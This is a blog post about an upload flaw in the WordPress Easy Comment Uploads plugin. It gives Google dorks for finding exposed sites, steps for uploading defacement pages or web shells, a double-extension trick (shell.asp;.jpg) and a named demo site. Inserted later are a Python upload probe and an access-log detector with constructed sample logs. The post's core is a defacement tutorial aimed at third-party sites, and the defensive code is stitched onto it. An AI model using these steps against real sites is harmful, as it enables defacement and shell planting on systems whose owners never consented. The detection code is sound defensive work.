WordPress Exploit: Thousands of Websites Are Vulnerable
This vulnerability is known as the WordPress Easy Comment Uploads vulnerability: the plugin's upload-form.php can be reached by anyone, and the form it shows lets the visitor upload files straight into the site's media folder.
Many of you will already know about it, but I wrote this article for those who don't; it could be fun!
Google dorks:
"inurl:/wp-content/plugins/easy-comment-uploads/upload-form.php"
/wp-content/plugins/easy-comment-uploads/upload-form.php
Index of /wp-content/plugins/easy-comment-uploads
Open Google and enter any of the dorks given above, then pick a site from the results.
Go to this URL: site.com/wp-content/plugins/easy-comment-uploads/upload-form.php
You'll see an upload option here :)
Now upload your deface page ....
Then check for it here: site.com/wp-content/uploads/2011/05/yourfilehere (WordPress stores uploads in a year/month folder by default, so use the current year and month).
Note :- On some sites you can only upload your deface as a .txt file ... a shell can be uploaded on about 50% of sites ... if the shell is refused, try it in image format, e.g. shell.asp;.jpg. Whether such a file then runs depends on the web server, not on the plugin: the ";" trick relies on an IIS 6 filename-parsing bug and does nothing on Apache/PHP.
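The walk-through above can be turned into a repeatable check. The Python below is an added example, not code from the original post: it fetches the plugin's upload-form.php, confirms the page really exposes a multipart file form, uploads a harmless text marker (the .txt case the note says always works) and looks for it under /wp-content/uploads/YYYY/MM/. HTTP is passed in as two callables, so it runs offline here against the constructed FakeSite; the site name, the field name `upload` and the marker string are assumptions. Wrap `requests` or urllib in the same two signatures for a live check against a site you are authorised to test.

```python
"""Exposure check for the Easy Comment Uploads upload form.

Added example, not code from the original post. HTTP GET/POST are passed
in as callables so the logic runs offline against the constructed FakeSite
below; wrap `requests` (or urllib) in the same two signatures for a live
check against a site you are authorised to test.
"""
import datetime
from html.parser import HTMLParser
from typing import Callable, Dict, Optional

PLUGIN_PATH = "/wp-content/plugins/easy-comment-uploads/upload-form.php"
UPLOADS_PATH = "/wp-content/uploads"


class _FormScanner(HTMLParser):
    """Notes whether the page holds a multipart form with an <input type=file>."""

    def __init__(self) -> None:
        super().__init__()
        self.multipart = False
        self.file_field: Optional[str] = None

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}
        if tag == "form" and a.get("enctype", "").lower() == "multipart/form-data":
            self.multipart = True
        if tag == "input" and a.get("type", "").lower() == "file":
            self.file_field = a.get("name") or "file"


def file_field_name(html: str) -> Optional[str]:
    """Name of the file input if the page exposes an upload form, else None."""
    scanner = _FormScanner()
    scanner.feed(html)
    return scanner.file_field if scanner.multipart else None


def upload_url(base: str, filename: str, year_month: Optional[str] = None) -> str:
    """WordPress stores uploads under /wp-content/uploads/YYYY/MM/ by default."""
    year_month = year_month or datetime.date.today().strftime("%Y/%m")
    return f"{base.rstrip('/')}{UPLOADS_PATH}/{year_month}/{filename}"


def check_site(base: str, get: Callable[[str], Optional[str]],
               post: Callable[[str, str, str, bytes], int],
               marker: str, year_month: Optional[str] = None) -> Dict[str, object]:
    """Probe with a harmless .txt marker (the type the post says always works).

    get(url) -> body, or None on 404; post(url, field, filename, data) -> status.
    """
    base = base.rstrip("/")
    result: Dict[str, object] = {"form_exposed": False, "upload_works": False, "probe_url": None}
    page = get(base + PLUGIN_PATH)
    field = file_field_name(page) if page else None
    if field is None:
        return result  # plugin missing, removed, or form no longer public
    result["form_exposed"] = True
    filename = f"{marker}.txt"
    post(base + PLUGIN_PATH, field, filename, marker.encode())
    url = upload_url(base, filename, year_month)
    body = get(url)
    if body is not None and marker in body:
        result["upload_works"] = True
        result["probe_url"] = url
    return result


class FakeSite:
    """Constructed stand-in for a vulnerable site (assumption, not a real server)."""

    FORM = ('<form method="post" enctype="multipart/form-data">'
            '<input type="file" name="upload"><input type="submit"></form>')

    def __init__(self, base: str, year_month: str) -> None:
        self.base, self.year_month, self.files = base.rstrip("/"), year_month, {}

    def get(self, url: str) -> Optional[str]:
        if url == self.base + PLUGIN_PATH:
            return self.FORM
        return self.files.get(url)  # None plays the role of a 404

    def post(self, url: str, field: str, filename: str, data: bytes) -> int:
        # The plugin saves whatever it is given into the month's upload folder.
        self.files[upload_url(self.base, filename, self.year_month)] = data.decode()
        return 200


if __name__ == "__main__":
    site = FakeSite("http://site.example", "2011/05")
    print(check_site(site.base, site.get, site.post, "ecu-probe-a1b2", site.year_month))
```

The marker is checked in the fetched body, not just the status code, so a site that answers 200 for everything does not produce a false positive; use a random marker per run so a stale file from an earlier probe cannot be mistaken for a fresh upload.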
DEMO:
http://www.findthepearl.com/
http://www.findthepearl.com/wp-content/plugins/easy-comment-uploads/
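On the defensive side, the same sequence leaves a clear trace in the web-server access log: a POST to the plugin's upload-form.php, then a GET of a fresh file under /wp-content/uploads/ by the same client, often with an executable or double extension such as shell.asp;.jpg. The Python below is an added example, not part of the original post; the log lines are constructed in Apache combined format with documentation IP addresses, and the extension list and rule names are assumptions.

```python
"""Access-log detection for abuse of the Easy Comment Uploads form.

Added example, not part of the original post. Flags three things: a POST to
the plugin's upload-form.php, a GET of an executable-looking file under
/wp-content/uploads/ (covers shell.php, shell.php.jpg and shell.asp;.jpg),
and a GET under uploads by a client that earlier POSTed to the form.
"""
import re
from typing import Dict, List, Optional
from urllib.parse import unquote

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+)')

UPLOAD_FORM = "/wp-content/plugins/easy-comment-uploads/upload-form.php"
UPLOADS_DIR = "/wp-content/uploads/"
# Extensions a web server might execute; nothing legitimate in uploads uses them.
EXEC_EXT = {"php", "php3", "php4", "php5", "phtml", "phar", "asp", "aspx", "jsp", "cgi", "pl"}


def risky_upload_name(filename: str) -> bool:
    """True if any extension component (split on '.' and ';') is executable."""
    parts = re.split(r"[.;]", filename.lower())
    return any(p in EXEC_EXT for p in parts[1:])


def parse(line: str) -> Optional[Dict[str, str]]:
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def detect(lines: List[str]) -> List[Dict[str, object]]:
    alerts: List[Dict[str, object]] = []
    posters = set()  # clients that have POSTed to the upload form so far
    for line in lines:
        rec = parse(line)
        if rec is None:
            continue  # malformed line: skip rather than crash the pass
        path = unquote(rec["path"].split("?", 1)[0])
        rules = []
        if rec["method"] == "POST" and path.endswith(UPLOAD_FORM):
            posters.add(rec["ip"])
            rules.append("upload-form-post")
        elif path.startswith(UPLOADS_DIR):
            if risky_upload_name(path.rsplit("/", 1)[-1]):
                rules.append("executable-in-uploads")
            if rec["ip"] in posters:
                rules.append("uploader-fetched-file")
        if rules:
            alerts.append({"ip": rec["ip"], "ts": rec["ts"], "path": path, "rules": rules})
    return alerts


# Constructed sample log (documentation IPs, not real traffic).
SAMPLE_LOG = """\
203.0.113.7 - - [20/May/2011:10:01:02 +0000] "GET /wp-content/plugins/easy-comment-uploads/upload-form.php HTTP/1.1" 200 1843 "-" "Mozilla/5.0"
203.0.113.7 - - [20/May/2011:10:01:30 +0000] "POST /wp-content/plugins/easy-comment-uploads/upload-form.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.7 - - [20/May/2011:10:01:45 +0000] "GET /wp-content/uploads/2011/05/shell.asp;.jpg HTTP/1.1" 200 2210 "-" "Mozilla/5.0"
203.0.113.7 - - [20/May/2011:10:02:10 +0000] "GET /wp-content/uploads/2011/05/deface.txt HTTP/1.1" 200 120 "-" "Mozilla/5.0"
198.51.100.4 - - [20/May/2011:10:05:00 +0000] "GET /wp-content/uploads/2011/05/holiday.jpg HTTP/1.1" 200 90211 "-" "Mozilla/5.0"
not a log line
""".splitlines()

if __name__ == "__main__":
    for alert in detect(SAMPLE_LOG):
        print(alert)
```

The first GET of the form page is deliberately not flagged on its own (crawlers hit it too); the POST is the signal. The "uploader-fetched-file" rule is what catches a .txt defacement, which no extension list would.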
Thank you for reading; stay in touch with filehouse for all the latest updates :)
I will recommend my friends to read this. I will bookmark your blog and have my children check up here often. I am quite sure they will learn lots more new stuff here than from anybody else!
@Monster
Thanks